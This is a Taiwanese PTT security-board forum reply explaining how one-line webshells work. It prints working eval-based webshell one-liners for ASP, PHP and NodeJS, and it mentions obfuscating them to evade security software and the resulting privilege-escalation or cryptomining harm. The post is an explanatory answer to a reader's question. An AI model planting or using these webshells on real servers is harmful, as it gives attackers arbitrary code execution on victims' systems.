Re: [問題] 一句話木馬

看板NetSecurity (資安 資訊安全)作者 (不要偷 Q)時間5年前 (2019/05/25 11:22), 5年前編輯推噓3(302)
留言5則, 2人參與, 5年前最新討論串2/3 (看更多)
※ 引述《newnovice (serenity)》之銘言: : 在網路上看到這個東東 : <%@ Page Language="Jscript" validateRequest="false" : %><%Response.Write(eval(Request.Item["w"],"unsafe"));%> : 挺有趣的,有大神可以解釋這一行作用嗎,感謝。 我曾經比較熟 PHP 版本的一句話木馬 畢竟 PHP[0] 是最厲害的程式語言 (疑) PHP 版本的一句話木馬木馬可以是 <?php eval($_POST['x']); ?> PHP 本身就是一種樣板 (Template) 語言 他可以在後端執行程式、結果渲染在前端 如果 熟悉 PHP 或者看過上一篇的推文可以知道 這段程式碼可以拆解成 <?php // PHP start symbol eval( // builtin function and execute any PHP source code $_POST['x'] // data from POST method which key is 'x' ); ?> // PHP end symbol 可以發現重點在於透過一句話木馬的 eval 來執行任意 PHP 程式碼 這代表類似功能的網頁語言都可以有一句話木馬 像是 ASP 版本的 <%eval request (x); %> NodeJS 的 eval(req.query.pass) 都是透過 eval 等程式語言內建可以執行程式碼本身的功能 而怎麼利用一句話木馬 就要問你程式功力如何了 (煙) 你可以用程式做到什麼事情 一句話木馬就可以做到 80~99% 的事情 進階的問題則是如何隱藏一句話木馬 畢竟這年頭一句話木馬已經被廣泛(?)使用 大多數安全軟體都宣稱可防範一句話木馬 在我之前的文章[1] 有提到混淆 Webshell 的例子 就是透過一大堆 _ 來組成 webshell 需要的內容 至於一句話木馬可以造成的危害 就是系統設定跟提權的問題 假若你的 Web Service 是用 root 執行 那透過一句話木馬跟拿到 reversed shell 沒有太大的差別 如果有降權或者跑在 docker 裡面 那一句話木馬能造成的危害 大概就是讓你的電腦 替區塊鏈世界盡一分心力 [0]: https://zh.wikipedia.org/wiki/PHP [1]: https://www.ptt.cc/bbs/NetSecurity/M.1517412273.A.E5F.html -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 106.1.224.240 ※ 文章網址: https://www.ptt.cc/bbs/NetSecurity/M.1558754535.A.B34.html ※ 編輯: CMJ0121 (106.1.224.240), 05/25/2019 11:23:25

05/25 20:09, 5年前 , 1F
推推詳細,可以再補充幾個混淆的形式
05/25 20:09, 1F

05/25 20:10, 5年前 , 2F
唉,下面有
05/25 20:10, 2F

05/25 20:12, 5年前 , 3F
嗯,上一篇沒有一句話範例
05/25 20:12, 3F

05/25 23:19, 5年前 , 4F
非常感謝版主詳細說明 渲染一詞說得真好
05/25 23:19, 4F

05/25 23:20, 5年前 , 5F
區塊鏈世界盡一分心力XD 看來要好好KK程式了(茶)
05/25 23:20, 5F
文章代碼(AID): #1SwBJdiq (NetSecurity)
討論串 (同標題文章)
本文引述了以下文章的的內容:
完整討論串 (本文為第 2 之 3 篇):
文章代碼(AID): #1SwBJdiq (NetSecurity)